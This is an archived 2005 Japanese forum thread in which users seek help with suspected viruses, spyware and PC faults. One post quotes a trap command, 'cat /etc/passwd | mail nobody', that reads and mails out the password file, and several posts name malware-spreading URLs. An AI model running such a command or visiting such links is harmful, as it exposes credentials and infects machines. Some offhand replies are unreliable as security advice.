216203=205:2005/04/04(月) 15:52:17
>>204
どうもです、一応spybotで駆除が完了したようです。
10ヶ月使用してたPCですが20匹ほどいたみたいです。

ありがとうございました。
217:2005/04/04(月) 21:52:41
ホムぺなどで出るIPって何か情報調べられるんですか?
218名無しさん@お腹いっぱい。:2005/04/05(火) 01:12:23
3/26に親父から電話があって、
どうもパソコンが起動しなくなったらしい・・・

で、見に行ってみると確かにWindowsのロゴすら出てこない
っていうか、ハードディスクを読んでいないような気が・・・

ハードディスクのフォーマットを試みたが、
0%完了のまま固まって動かん

OSは、XPだが、
なんかWin95/CIHに感染したっぽい
でも、確かNT系のOSにはかんせんしないハズ!

誰か3/26に同じような症状になった人います?
219名無しさん@お腹いっぱい。:2005/04/05(火) 01:15:26
>>218
うちのオヤジもなった。
フロッピ入れてた。
220218:2005/04/05(火) 01:16:57
>219
うちの親父のマシン
FDDありません
221219:2005/04/05(火) 01:18:57
>>220
そっか。オレは二時間あーでもこーでもないってやってた。
起動するときのFDDチェックの音がかわってるな、と思ったら入ってた(;^ω^)
222名無しさん@お腹いっぱい。:2005/04/05(火) 01:23:23
>221
うちは、結局、販売店にもって言って見てもらったが、
ハードの故障と言うことで、修理になった。
保障期間内なので無償だが、
おいらは今だにWin95/CIH系のウィルスが原因だと思っている。

まあ、親父のマシンにはノートン先生もちゃんといらっしゃったハズですが・・・
親父が、どんな操作してるか分からんから何とも言えん
223219:2005/04/05(火) 01:31:23
>>222
ノートンが居て、Win95/CIH系なんて言う、古典落語に引っかかるはずが無い。
マジでBIOS吹っ飛んだとか、チップセットが飛んだんだろうよ。
224名無しさん@お腹いっぱい。:2005/04/05(火) 01:39:06
>>223
ウイルスと古典落語の関連性を詳しく。
225219:2005/04/05(火) 01:52:36
>>224
すまん。「こてん」で古典落語を登録してた。
226名無しさん@お腹いっぱい。:2005/04/05(火) 02:59:15
WORM_MYTOB.Vとやらが送られてきた
メールからウィスルとか初めてだからドキっとしてしまったよ
これは新しいヤツなのかな?
227名無しさん@お腹いっぱい。:2005/04/05(火) 03:11:06
名前で検索すればぁ?
228名無しさん@お腹いっぱい。:2005/04/05(火) 03:58:30
>>225
「こてん」で古典落語を登録した経緯を詳しくw
229トーシロー:2005/04/05(火) 12:33:36
>>218
フォーマットを試行できるということはBIOS自体はHDDを認識してるんだろうから
単にHDDの故障じゃないの。
230名無しさん@お腹いっぱい。:2005/04/05(火) 13:20:18
タスクマネージャを開くとプロセスに乗っている部分で文字化けが数カ所あるんだが
ウィルスなんですか?
231名無しさん@お腹いっぱい。:2005/04/05(火) 13:34:10
外国産のウイルスかスパイウェアだろewidoでスキャンしろ!!!!!!!!!!!!
232名無しさん@お腹いっぱい。:2005/04/05(火) 17:52:08
VBS LOVE LETTER A ってヤバいのだろうか?一応アンチウィルスは入っているが・・・。
いささか心配…。
233名無しさん@お腹いっぱい。:2005/04/05(火) 18:16:04
>>232
2ちゃん見てて、アンチウィルスソフトがノートンなら、
ノートントラップだから、心配ない
234名無しさん@お腹いっぱい。:2005/04/05(火) 18:17:17
>>233
2ちゃん見てる時に、ノートンが反応して、
検出されたのが、LOVE LETTERならって意味ね。
書き方が悪かった。スマソ○┓ペコ
235名無しさん@お腹いっぱい。:2005/04/05(火) 19:27:46
>>233>>234
おっしゃる通りです。2ちゃん見てての出来事です。
ありがとうございました。安心しました。
236名無しさん@お腹いっぱい。:2005/04/06(水) 00:03:19
昨日から、ウイルスらしきものがあったので、少し遊んでた。

実況しようかともおもったが、とりあえずさくっと、対処したら症状が出なくなったので、実況なしだが。
あとで、詳しく紹介する。
237名無しさん@お腹いっぱい。:2005/04/06(水) 00:06:59
やっぱりやめ 糸冬 了
238名無しさん@お腹いっぱい。:2005/04/06(水) 00:08:45
いや〜〜、厄介なウイルスのようだった。

なんせ、
ノートン反応せず。
トレンドオンライン反応せず。

唯一、tmp.state.tmp というファイルが%system%system32\driversでリアルタイムスキャンに引っかかる程度。
ただし、これはリアルタイムスキャンで排除しているので、感染前に対処できていた模様。
それとは異なる汚染源がある様だった。
239名無しさん@お腹いっぱい。:2005/04/06(水) 00:10:19
【使用OS】 XP
【WindowsUpdateしてるか】 してるす
【AntiVirusは何を使っているか】 ウイルスバスター
【ちゃんとUpdateしてるか】 してるす
【スキャンした結果(ウイルス名・発見場所)】 TROJ_ANICMOO.D (発見場所は下記参照して下さい)
【別のオンラインスキャンしたならその結果は】 ノートンオンラインウイルススキャン ウイルスなし
【症状を具体的に、分かる限りすべて書く】 ウイルスバスターで隔離できませんでしたって なった
【何をしたらそんなことになったのか】 アプロダのjpgを開いた
【これまでにとった措置】 Temporary Internet Files TEMP Cookie の削除
【その他の質問】
ttp://samurize.parfe.jp/upload/source/up1331.jpg
これをふんでTROJ_ANICMOO.Dを検出しました。
(IE6で JavaScript Javaの実行 ActiveX はoffにしてあります)

\Temporary Internet Files\content.IE5\2D6CWH6L\spoloit[1].anr を隔離できませんでした
\Temporary Internet Files\content.IE5\2D6CWH6L\spoloit[1].anr を隔離できませんでした
\Temporary Internet Files\Content.IE5\CNTBQIZ9\sploit[1].anr を隔離できませんでした
\Temporary Internet Files\Content.IE5\CNTBQIZ9\sploit[1].anr を隔離できませんでした
\Temporary Internet Files\Content.IE5\Q5TMFYT0\sploit[1].anr を隔離できませんでした
\Temporary Internet Files\Content.IE5\Q5TMFYT0\sploit[1].anr を隔離できませんでした
\Temporary Internet Files\Content.IE5\3UO7B9KT\sploit[1].anr を隔離できませんでした

ってなり、ウイルスバスターのHPで検索してもデーベースにはありませんってなります。
msconfigのスタートアップには新たなスタートアップ項目は追加されてません。

ちゃんと駆除できてるか心配です。最新のウイルスでしょうか?
240名無しさん@お腹いっぱい。:2005/04/06(水) 00:19:33
>>238
というわけで、
# どういうわけだ。
#239 とは全く関係ないんだが。

1.どうも最近Winnyやってもないのに帯域が食われている
2.リアルタイムスキャンでなんか引っかかることが良くある

場合には、smss.exeを検索してプロパティみてみそ。
240kByteだったら、さくっと削除しないといけないみたいね。
普通は45〜50kByte程度だから。
俺の場合には %system%system32\drivers にあったけど。

ただし、Systemが起動しているので、通常の起動状態では削除できないよん

241名無しさん@お腹いっぱい。:2005/04/06(水) 00:25:39
特徴としては次のとおり

なぜだか IRCサーバに接続している ( ポート6667 )
それ以外に ポート1500程度で接続している( IRC のレスポンスを出しているみたいだが )
数百MByteの動画ファイルを交換している
smssが他のポート80を叩いている


うーーん、都合の良いProxyにされちゃったのかなぁ。
242名無しさん@お腹いっぱい。:2005/04/06(水) 00:29:01
書き方が悪いね。書き直すね。

自分がIRCを立ち上げていないにもかかわらずIRCサーバに接続している ( ポート6667 )
自分とIRCサーバの間で数百MByteの動画ファイルを交換している
自分がsmssが他のポート80を叩いている

誰かがポート1500程度で接続している( IRC のレスポンスを出しているみたいだが )
このセッションのプロセス名は葱によると不明となっている
こいつはWin2k臭い

そんなところか。
243名無しさん@お腹いっぱい。:2005/04/06(水) 00:32:20
          In_
        ⊂(@ε@-)つ、 -3  電脳空間では最低の詭弁師
      //(雑音/_/::::|    ←ネット内弁慶
      |:::|/⊂ヽ ノ|:::| /」      決め技は「遁走」 
    / ̄ ̄旦 ̄ ̄ ̄/|
  /______/ .| |
  | |-----------| |
244名無しさん@お腹いっぱい。:2005/04/06(水) 00:36:32
Spybotなどのチェックも問題なし。
ダイアルアップルータもあり外からの接続も拒否しているので、
どうやら、smssが内から外に接続しているようだ。

葱によると、不明なものをのぞいて、smss.exeがセッションを張っているらしい。
これが相当怪しい。っちゅうか、セッションマネージャがセッションを張るんか?

というわけで、さくっと該当するsmss.exeをポアしたところ症状が出なくなりました。

と言う顛末でおま。


ま、気をつけてね。
245名無しさん@お腹いっぱい。:2005/04/06(水) 00:37:06
>>239
心配ない。インターネットフォルダの一時ファイルだから。
246名無しさん@お腹いっぱい。:2005/04/06(水) 00:42:26
>>243
削除したファイルがサルベージできたら、どっかにおいてやるよ。
247239:2005/04/06(水) 00:47:57
>>245
そうですか!すげー心配でした。答えてくれてありがとうございます。
248名無しさん@お腹いっぱい。:2005/04/06(水) 00:48:39
>>244
おまえはトロイを検出するソフトの存在もしらないのか。
その手のファイルならパターン定義ですぐに引っ掛かる。
249名無しさん@お腹いっぱい。:2005/04/06(水) 01:16:16
   馬鹿一確の俺にどうかアドバイスを
【使用OS】 xp
【WindowsUpdateしてるか】 してない
【AntiVirusは何を使っているか】 つかってない
【ちゃんとUpdateしてるか】 してない
【スキャンした結果(ウイルス名・発見場所)】 できない
【別のオンラインスキャンしたならその結果は】 してない
【症状を具体的に、分かる限りすべて書く】 立ち上がり始めると、フリーズ
                     しばらくすると「HI」とでてくる。
                     クリックすると消える。
                    で、画面は背景のみで何も立ち上がらない。
【何をしたらそんなことになったのか】 lolworld.ecstazy.info/cjstats/index.html
                   これふんだ
【これまでにとった措置】 なにもしてない できない
【その他の質問】 OS再インストする方法教えてください。
        リカバリCDいれて電源入れても読みません。





250名無しさん@お腹いっぱい。:2005/04/06(水) 01:30:47
>>249
緊急事態時に頼りにするのは2ちゃんじゃなくて友達にしよう。
家に来て貰っても電話でもそっちのほうが早く解決すると思うよ。
もしかしたらBIOSに入って設定変更しないといけないかもしれないから
そういうの文章で書くのめんどいし伝わらないし、ね。
251名無しさん@お腹いっぱい。:2005/04/06(水) 01:38:22
>>250
レス、ありがとう。
こんな遅い時間に返事くれてちょっと嬉しいよ。
また,明日にでも誰かに聞くことにします。
252名無しさん@お腹いっぱい。:2005/04/06(水) 05:01:18
アミララって何ですか?
253名無しさん@お腹いっぱい。:2005/04/06(水) 08:22:25
あるスレのメール欄に「sage cat/etc/passwd │mail nobody(以下cat〜に略)」(念のため全角で書いてます)と
半角で書いてあり、クリックしてみました。outlookが立ち上がり、「cat〜」の部分だけコピーしてメモ帳(txt)ファイルに貼り付け保存しました。
outlookはコピーした後、終了しました。
メモ帳ファイルには貼り付けた一文以外にも大して重要ではないですが文章や単語を書き殴ってあって、文字通りメモとして使ってました。

「cat〜」のうち「cat/etc/passwd」をブラウザのアドレス欄に貼って実行してみました。
すると、ノートンが警告して「Unix.Penguin」と出ましたので、ブラクラと判断し、ブラウザを終了しました。
しばらく後、さっきのメモ帳を開けようとすると、ノートンが警告して、「Unix.Penguin」が反応しました。
シマンテックでウイルススキャンし、「Unix.Penguin」について調べると、

「シェル スクリプト ファイル内で Unix.Penguinが検出された場合、そのファイルにはおそらく、ユーザのシステム パスワード データ ファイルを
電子メールで送信するように指示する命令が含まれています。」とありました。
また、駆除方法として「不審なシェル スクリプト(自分で書いた記憶がないシェル スクリプトなど)が存在する場合、そのスクリプトを削除」とありました。

メモ帳ファイルを削除しようと思いましたが、実行しようとするたびにノートン警告が起動し削除出来ません。
幸いそのメモ帳はフォルダ内にあったので、他のファイルを全て移して、フォルダごと削除しゴミ箱からも消去しました。

これで一安心と思っていたのですが、よく思い出してみると、「cat〜」の部分をメモ帳にコピーして保存した後に、ヤフーオクションIDにログインしたのを思い出しました。

私の対処方法は良かったのでしょうか?また、ヤフーオクションID及びパスワードは電子メールで送信されたのでしょうか?宜しくお願いします。
254名無しさん@お腹いっぱい。:2005/04/06(水) 09:01:35
>>253
とりあえずパスワードを変更しる
255名無しさん@お腹いっぱい。:2005/04/06(水) 17:21:51
雇われるウイルス作成犯!?
ttp://headlines.yahoo.co.jp/hl?a=20050406-00000097-myc-sci
256名無しさん@お腹いっぱい。:2005/04/06(水) 18:22:41
>>255
YAHOO!NEWS ウソ臭え
Aladdin Knowledge Systemsは情報を詳細に掴んでいるんだからソフトを買えと?
バカじゃねえの
257名無しさん@お腹いっぱい。:2005/04/06(水) 19:03:59
ノートンでトロイを検出出来る?
258名無しさん@お腹いっぱい。:2005/04/06(水) 19:21:43
>>257
ある程度はね
259名無しさん@お腹いっぱい。:2005/04/06(水) 23:05:24
Unix.Penguinってトロイじゃないの?
260名無しさん@お腹いっぱい。:2005/04/06(水) 23:24:45
自己増殖系のウィルスとファイルを消していくウィルスを同時に実行したらどっちが勝ちますか?
261名無しさん@お腹いっぱい。:2005/04/06(水) 23:37:58
>>260
詳しく
262名無しさん@お腹いっぱい。:2005/04/06(水) 23:49:10
          In_
        ⊂(@ε@-)つ、 -3  電脳空間では最低の詭弁師
      //(雑音/_/::::|    ←ネット内弁慶
      |:::|/⊂ヽ ノ|:::| /」      決め技は「遁走」 
    / ̄ ̄旦 ̄ ̄ ̄/|
  /______/ .| |
  | |-----------| |


263名無しさん@お腹いっぱい。:2005/04/07(木) 03:49:24
なんか画面の右下に検索する奴がでるようになったのですが
これウィルスなのでしょうか
終了もできないし
タスクバーのとこから出現したりひっこんだりするのでうざくてしかなたないっす
これどうにかならないんですか?
264名無しさん@お腹いっぱい。:2005/04/07(木) 07:44:51
>>263
>>1
265名無しさん@お腹いっぱい。:2005/04/07(木) 11:47:49
【使用OS】 XP SP1
【WindowsUpdateしてるか】2週間くらいしてないかも・・・
【AntiVirusは何を使っているか】 ウィルスバスター2004
【ちゃんとUpdateしてるか】 毎日してます。症状が出る2時間くらい前にもしました
【症状を具体的に、分かる限りすべて書く】
OS立ち上げると勝手にスタンバイ状態にされて何も出来ないです。
電源入れた直後に青い画面に英文字で色々書かれた画面がでます。
【何をしたらそんなことになったのか】
リアルワンプレイヤーでストリームラジオ?流していたら、
リアルから何らかの命令が来ましたが切断しますか?(よく覚えていません)
みたいなメッセージがリアルのウインドウで表示されたので、それには答えずウインドウ自体を閉じたら
直後に、スタンバイ状態にされました。
何度も立ち上げなおしていたら、別の人がアクセスしています、というメッセージが表示されました。
数ヶ月前も同じように強制的にスタンバイに状態にされた事がありますが
何度か立ち上げなおしてたら、その症状は出なくなった気がします。その後ウィルススキャンしましたが
異常なしと判断されました。
【これまでにとった措置】 トゥルーイメージで1年前に作った、システムの入った
パーティションイメージを復元しましたが、直りませんでした。
【その他の質問】
ウィルスなのかスパイウェアなのか分かりませんがよろしくお願いします。
266名無しさん@お腹いっぱい。:2005/04/07(木) 12:06:15
:::::::::::::::::::::::::::::    ,.-ヽ
::::::::::::::::::::::   ____,;' ,;- i                         へ、     /;へ\
::::::::::::::::::   ,;;'"  i i ・i;                       // _l::|___l::|_ヽ:ヽ
:::::::::::::::  ,;'":;;,,,,,, ;!, `'''i;          / ̄ ̄ ̄ ̄\,,     |l/−、 −、:::::::::::::::`::|
:::::::::::  ,/'"   '''',,,,''''--i        /       __ヽ    /::::::|  ・|・  | 、::::::::::::::\
:::::::::  ;/  .,,,,,,,,,,,,,,,,,   ;i'⌒i;       |       |   |、   /::/ `-●−′ \:::::::::::ヽ
:::::::  i;"     ___,,,,,,,  `i".       |       ∩─| |  ,|/ ── |  ──   ヽ:::::::::|
::::::: i;    ,,;'""" `';,,,  "`i;      |      ∪  `l   |. ── |  ──   .|::::::::|
::::::: |  ''''''i ,,,,,,,,,,  `'--''''"       ヽ __/  _.ノ    | ── |  ──     |:::::_l__
::::::: |.    i'"   ";               |――― 、".      ヽ (__|____  /::::| 新 |
::::::: |;    `-、.,;''"             /  ̄ ̄ ̄ ̄^ヽ∞=、  \           /:::,/| 品 |
::::::::  i;     `'-----j          | |      |  |っ:::::)  l━━(t)━━━━┥ |___|
267名無しさん@お腹いっぱい。:2005/04/07(木) 12:08:14
>>265
俺もまったく同じ現象が起きた。
結局、そのときはメモリー不良だった。

>電源入れた直後に青い画面に英文字で色々書かれた画面がでます。

これに何て書いてあるかデジカメに撮るなりしてアップしてくれないと
一生不明のままだと思うよ。
268名無しさん@お腹いっぱい。:2005/04/07(木) 12:49:10
>>267
どうも
お、そうなんですか
ハード的な問題の可能性も強いと言う事ですか
だとしたら復元とかしなきゃ良かった・・・
帰宅したらデジカメで撮ってみます
269名無しさん@お腹いっぱい。:2005/04/07(木) 15:34:23
あげ
270名無しさん@お腹いっぱい。:2005/04/07(木) 16:45:02
教えてください。

【使用OS】XP homeedition
【WindowsUpdateしてるか】してます
【AntiVirusは何を使っているか】norton antivirus2005
【ちゃんとUpdateしてるか】してます。
【スキャンした結果(ウイルス名・発見場所)】Bllodhound.exploit.6   
【別のオンラインスキャンしたならその結果は】してない
【症状を具体的に、分かる限りすべて書く】特にになにもない
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
ノートンでも削除できなかったらしく、ウイルスチェックしたら検疫済みとのこと。
今のところなんの害もないのですが、駆除しなければいけないんですよね?
駆除の仕方がわからなくて。
お願いいたします

271名無しさん@お腹いっぱい。:2005/04/07(木) 17:12:47
>>270
いえ。そのまま放っておいて害はありません。
272名無しさん@お腹いっぱい。:2005/04/07(木) 17:20:01
>>271
そうなんですか!
ありがとうございます。たすかりました。
273名無しさん@お腹いっぱい。:2005/04/07(木) 17:46:27
対処方法わかる方アドバイスお願いします。

【使用OS】Windows98SE
【WindowsUpdateしてるか】していた
【AntiVirusは何を使っているか】プリインストールのノートンアンチウイルス
【ちゃんとUpdateしてるか】たまにしていた
【スキャンした結果(ウイルス名・発見場所)】異常なし
【別のオンラインスキャンしたならその結果は】異常なし

【症状を具体的に、分かる限りすべて書く】
アウトルックの受信トレイなど<*.dbx>のファイルにゴミ(パソコン内のデータ)が入る。
消してもアウトルック立ち上げると再び同じようなファイルができる。
(新しい空のファイルのはずなのに75KB)
また、アドレス帳を更新したら、デスクトップに意味不明のゴミファイルができる。
(主にアドレス帳の中身)

【何をしたらそんなことになったのか】不明。
【これまでにとった措置】
すべてのドライブをフォーマットし、再度プリインストールしたが、それでも直らない。
現在はアウトルックエクスプレスをアンインストールし、メールはweb上でしている。
【その他の質問】
ブロードバンドルータ(NTTのウエブキャスター)使用していますが、
ルータがウイルスに感染するということはあるのでしょうか?
(オヤジの)もう一台のパソコンがセキュリティー対策甘いので、それが原因でしょうか?
274名無しさん@お腹いっぱい。:2005/04/07(木) 18:18:16
>>189 ファイル消すと違う名前ms[任意の英字列].exeがPC起動時に
作成されませんか?知り合いのPCが調子悪いって事で呼び出されて
バスターオンラインスキャンとノートン常駐で発見出来ず。a2スキャンで
1個見つかってその他2つはレジストリ項目等を探って対処。
残り1つが189さんの現象に酷似してますした。てかどういう使い方してるんだか
俺の知り合いは・・・nyやMXはHDには入って無かったのに・・・

SSM入れて監視した所svchost.exeプロセス経由でms[任意の英字列].exe
が立ち上がってきてプロセス切って単独で立ち上げようとしても機能しない
プログラムみたいでした。取りあえずms[任意の英字列].exeのアクセス権を
アドミンでも無効にして再起動後も立ち上がらない様にして放置しました・・・

すっかりその事忘れてたけどコノスレ読んでて思い出したのでググってみたら
ttp://www.atmarkit.co.jp/fwin2k/win2ktips/400svchost/svchost.html
これでぁゃιぃヤツ見つけられるかも。
ms[任意の英字列].exeは476KB位(手元にPC無いのでMD5とかは分かんない)で
Distributed Link Tracking Clientとして80番ポートでWAN側にアクセスを試みる
ヤツでした。違うウィルスだったらスマソ。
275名無しさん@お腹いっぱい。:2005/04/07(木) 18:22:28
>>273
OEのメールアカウントに余計なものが登録されているはずだ
デスクトップに.wa~のファイルが出来るのはウィンドウズアップデートで直っているはずだな
俺はXPだから詳細は知らない
276名無しさん@お腹いっぱい。:2005/04/07(木) 18:38:39
最近、exploit.6のカキコ多いな

少なくてもスレ内くらいは検索すりゃいいのに・・・。
277名無しさん@お腹いっぱい。:2005/04/07(木) 19:04:56
>>270
チミ、ソフトウェアの取説読んでるのか?
ヘルプなりなんなり一通り目を通そう。
278名無しさん@お腹いっぱい。:2005/04/08(金) 08:38:41
とあるURLを踏んでしまいました
後で、URLの鑑定スレにお願いした所、ウィルス反応ありという事で、
スパイボットサーチをかけた後、トレンドマイクロのオンラインスキャンをかけたのですが、後者では何も見つかりませんでした。
その為今現在なんのウィルスに感染した筈なのかも解りません。
前者の方は5つほど見つかったのですがこれは考えてみるとウィルスではなく別の所で拾ってきてしまっていたスパイウェアなのかなとも思いまして
どうしたら良いでしょうか。問題のURLなんかを貼っても良いですか?
279名無しさん@お腹いっぱい。:2005/04/08(金) 08:41:00
>>278
鑑定してもらったスレのURLを貼ってくれ
280名無しさん@お腹いっぱい。:2005/04/08(金) 08:45:11
>>279
ここです
http://pc8.2ch.net/test/read.cgi/hack/1103768644/

何度か質問されており、その都度ウィルス有りと言われているのですが内容まで言及したレスは見つからず…
281名無しさん@お腹いっぱい。:2005/04/08(金) 09:06:25
【使用OS】
 XP PRO

【WindowsUpdateしてるか】
 している
 
【AntiVirusは何を使っているか】
 AVG

【ちゃんとUpdateしてるか】
 している

【スキャンした結果(ウイルス名・発見場所)】
 C://WINDOWS/system32/shell32.dllが変更

【別のオンラインスキャンしたならその結果は】
「AVAST!」は検知せず

【症状を具体的に、分かる限りすべて書く】
 ファイルサイズがちょっと大きくなった。

【何をしたらそんなことになったのか】
 エロサイトを閲覧。

【これまでにとった措置】
 おもいっきり、うろたえました

【その他の質問】
 修復方法を教えてください

よろしくお願いします。m(_ _)m
282名無しさん@お腹いっぱい。:2005/04/08(金) 09:25:56
>>278>>280
テンプレ>>1見てきちんと環境等書くこと。
鑑定してもらったスレはレス番号まで書かないとどれかわからないよ。
283名無しさん@お腹いっぱい。:2005/04/08(金) 09:38:44
【使用OS】 XP home
【WindowsUpdateしてるか】 サービスパック2にする以外は全てしていました
【AntiVirusは何を使っているか】 未使用
【別のオンラインスキャンしたならその結果は】 トレンドマイクロのオンラインスキャンで発見できず
【症状を具体的に、分かる限りすべて書く】 今の所何も症状は見られず
【何をしたらそんなことになったのか】 URLのクリック
【これまでにとった措置】 
スパイボットサーチで現れた項を削除。後はクリックした後嫌な予感がしたので4つくらい立ち上がりかけた窓を端から×クリックして終了させました
【その他の質問】
本来なら何も起こらず、尚且つウィルススキャンに引っかからない以上気にしてもしょうがないかなと思うのですが
どうも気になってしまって

>>280
のスレの137、385、722なので上がりその前後で解答されています
問題のURLを踏むとどういったウィルスが入る筈なのか、入っているか確認する方法などありましたらお願いします
284名無しさん@お腹いっぱい。:2005/04/08(金) 09:58:39
>>283
「ダークロリータ」ですね。
http://foffo-gunkanmaki.hp.infoseek.co.jp/mini/20040901.html
ただ、XP SP1 + IE6 SP1 + 最新パッチなら深刻な被害はないかも。
シマンテックのオンラインスキャンhttp://www.symantec.com/region/jp/securitycheck/index.htmlもやってみるとよろし

アンチウィルスソフト常駐とFW、Windows Updateはきちんとやってくださいです。
ブラウザは初めてのサイトにいく時はIE以外のFirefoxやOperaを使うといいです(JavaScript無効で)。
285名無しさん@お腹いっぱい。:2005/04/08(金) 10:12:14
>>283
これを機にクリーンインストールしてSP2にして、アンチウィルスも導入したら?
286名無しさん@お腹いっぱい。:2005/04/08(金) 10:59:20
>>284
シマンテックでスキャンした所80いくつ出てきたんですがその9割9分が2ちゃんのログファイル(datファイル)から検出されました。。
これは今回のには直接関係なさそうですね。。

FWはXP付属のが動いてました。今回はこれらとウィンドウズアップデートに救われたのかな。。

>>285
うー検討してみます
287PC初心者:2005/04/08(金) 11:25:00
この間、スパイウェアにかかったので、ノートンとスパイボットと
アドウェアで駆除して全部消えたのですが、いまだに勝手に広告が出たりします。
どうすれば直るんですか?教えてください。
288名無しさん@お腹いっぱい。:2005/04/08(金) 11:26:36
>>287
Ewido tukae
289名無しさん@お腹いっぱい。:2005/04/08(金) 11:40:18
スパイウェアって、広告がポップアップされるのしか聞いたことないんだけど、
実害あるやつって他にどんなのがあるんですか?
290PC初心者:2005/04/08(金) 12:02:20
>>288
ありがとうございます。早速やってみます。
291名無しさん@お腹いっぱい。:2005/04/08(金) 12:13:18
ウィルスなんてちょれーよ。
292名無しさん@お腹いっぱい。:2005/04/08(金) 12:33:35
>>289
実害ないけどPC内の個人情報が相手に流れているだけ
293名無しさん@お腹いっぱい。:2005/04/08(金) 12:51:05
>>289
広告以外に、個人情報が相手に流れることがスパイウェアの主な害。それ以外にも
スパイウェアのセキュリティホールを悪用したハッキングなどがある。
後者に関してはあまり知られていない。たかがスパイウェアと甘く見ると
スパイウェア以外で痛い目に会うこともあるので注意が必要。
294265:2005/04/08(金) 12:55:02
昨日と同じ画面はでませんでしたけど
↓こういうのが出てシステムのチェック?が行われた後、
ttp://homepage2.nifty.com/furo/img/822.jpg
普通にOS起動しましたけど、暫く経ってやっぱりスタンバイになりました。
この画像を含むフォルダをUSBメモリに入れた直後、フォルダが勝手に
閉じて、このフォルダともう一つのフォルダが見当たらなくなりました(消失?)
やはりハードの不良でしょうか?
295名無しさん@お腹いっぱい。:2005/04/08(金) 13:05:58
>>294
画面のプロパティから電源オプションでスタンバイのタイマー設定があるのはご存じか?
296265:2005/04/08(金) 13:28:59
”なし”にしていた筈ですが最近チャックしてませんでしたので
帰宅したら早速調べてみます。ありがとうございます。
でもスタンバイになるのは不定期なんですよね・・・。
あとHL2ってゲームのセーブデータが
(当該フォルダ開けた事すらないのに)別ドライブのフォルダに
紛れ込んでいたりしたので、ウィルスなどの可能性も捨てきれない・・・。
297名無しさん@お腹いっぱい。:2005/04/08(金) 13:34:14
>>296
確かに、スタンバイ設定するウィルスもあるみたいですけどね。
298PC初心者:2005/04/08(金) 13:40:07
>>287ですが、さっきもう一度スパイボットでスキャンしたら
スパイウェアがまた復活していました・・・。orz
それと、Ewidoの使い方がいまいち良くわかりません・・・(つД`)
誰か親切な方、詳しく教えてください。お願いしまつ。
299名無しさん@お腹いっぱい。:2005/04/08(金) 13:43:05
>>298
アダルトサイト被害対策の部屋
ttp://www.higaitaisaku.com/
300名無しさん@お腹いっぱい。:2005/04/08(金) 13:47:41
>>296
ログオンのパスワードを設定し直せ。ハッカーに侵入されてるぞ。
301265:2005/04/08(金) 14:04:40
マジすか・・・パスワード設定してませんでした。
至急設定します。
302名無しさん@お腹いっぱい。:2005/04/08(金) 14:15:49
こんにちは、誰も触っていないのに、少し席を離れて戻って来たら、
ダイヤルアップネットワークのパスワード情報が、消えていました。

これは何かウィルスが関係しているのでしょうか?
他にもまったく環境を変えていないのに、突然今まで使えていたソフトが
エラー表示と共に使えなくなったりします。
ウィン2000、バスターを入れてはいるのですが、
ウィルスの可能性は有るのでしょうか。
御教授頂ければ幸いです。
303名無しさん@お腹いっぱい。:2005/04/08(金) 14:17:07
>>301
BIOS周りの故障 修理に出せ
304名無しさん@お腹いっぱい。:2005/04/08(金) 14:20:13
>>302
ウィルスじゃあるめえよ
不良ソフトをいっぱい飼っているからだ
実行ファイルからならレジストリなんてどうにでもいじれてしまうんだよ
305名無しさん@お腹いっぱい。:2005/04/08(金) 14:25:07
>>302
メモリも疑え
どうせバルクの安いの使ってるんだろう
306265:2005/04/08(金) 14:29:39
>>303
ご意見どうも。
もし修理に出すなら大量のアレな動画を何とかしないと・・・
307名無しさん@お腹いっぱい。:2005/04/08(金) 14:49:07
下半身を満足させる代償は大きいね。プ
308名無しさん@お腹いっぱい。:2005/04/08(金) 15:56:19
風俗に通う程は金かからねえぞ
309名無しさん@お腹いっぱい。:2005/04/08(金) 18:17:31
302です、レスありがとうございます。
ウィルスでは無い、ということに、少しホッとしていますが、
ダウンロードしたソフトの中に、不良の物が有って、レジストリが書き換えられてしまった、と言うことですか?
そんな怪しげなソフトを入れたつもりはなかっのですが。
どうしたら、ソフトの善し悪しを見抜く事が出来るのでしょうか。
またメモリですが、すみませんが書いて下さっている言葉の意味が判りません。
ディスク容量のことでは無いのですよね・・?
申し訳ありませんが、もう少し詳しく教えては頂けませんか、
お願いいたします。
310名無しさん@お腹いっぱい。:2005/04/08(金) 18:19:19
http://pc8.2ch.net/pcqa/
311名無しさん@お腹いっぱい。:2005/04/08(金) 18:23:22
>>309
マイコンピュータのアイコン右クリックして、
プロパティの「全般」のタブの右下あたりに書いてあるはず。
512MBとか256MBとか。

メモリの意味は
http://e-words.jp/w/E383A1E383A2E383AA.html
312名無しさん@お腹いっぱい。:2005/04/08(金) 19:56:13
【使用OS】 windowsXP
【WindowsUpdateしてるか】 してます。
【AntiVirusは何を使っているか】 ノートン使ってましたが少し前に
                期限切れて、そのまましばらくたってます。
【スキャンした結果(ウイルス名・発見場所)】発見できず。
【別のオンラインスキャンしたならその結果は】ウイルスバスター。発見できず。
【症状を具体的に、分かる限りすべて書く】昨日からインターネットに繋ぎ約一分
ほどするとブラウザ(IE6.0)が45秒ほどとまる。動き出して一分するとまた
 とまる これがずっと繰り返される。ブラウザ以外は動きます。
【何をしたらそんなことになったのか】僕だけが使うPCではないのでわかりません。
【その他の質問】 ウイルスなんでしょうか?
313名無しさん@お腹いっぱい。:2005/04/08(金) 20:35:00
(´・ω・`)知らんがな
314名無しさん@お腹いっぱい。:2005/04/08(金) 20:40:50
>>312
SP2ならインターネットオプション プログラムタブ アドオンの管理に
何かを組み込まれている
訳わからなかったら対処しようがないのでリカバリー
315名無しさん@お腹いっぱい。:2005/04/08(金) 21:00:59
>>312
ウイルス以外の可能性もあります。キャッシュを全て消してください。クッキーを全て消してください。
DNS設定、FW設定、ルーターの定義などを変えてないかチェックしてください。
316名無しさん@お腹いっぱい。:2005/04/08(金) 22:25:19
【使用OS】 XP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ノートン・アンチウイルス2005
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】  
Adware.Ezula
C:\WINDOWS\system32\Macromed\Shockwave 8\Xtras\download\TheGrooveAlliance\3DGrooveXtrav181\Groove.x32
C:\RECYCLER\S-1-5-21-220523388-1454471165-725345543-1005\Dc107.x32
【別のオンラインスキャンしたならその結果は】
XoftSpyを使用。感染してました(削除しても消えない)
【症状を具体的に、分かる限りすべて書く】
昨日いきなり「Norton Internet Worm Protectionが侵入の試みを検出して遮断しました。」とのメッセが数回出ました。
今日は上のメッセの他に、「Norton Internet Worm Protectionがコンピュータにアクセスしようとするリモートシステムを検出しました。」と出て
許可するか確認してきたので「遮断」を選択しました。
【何をしたらそんなことになったのか】
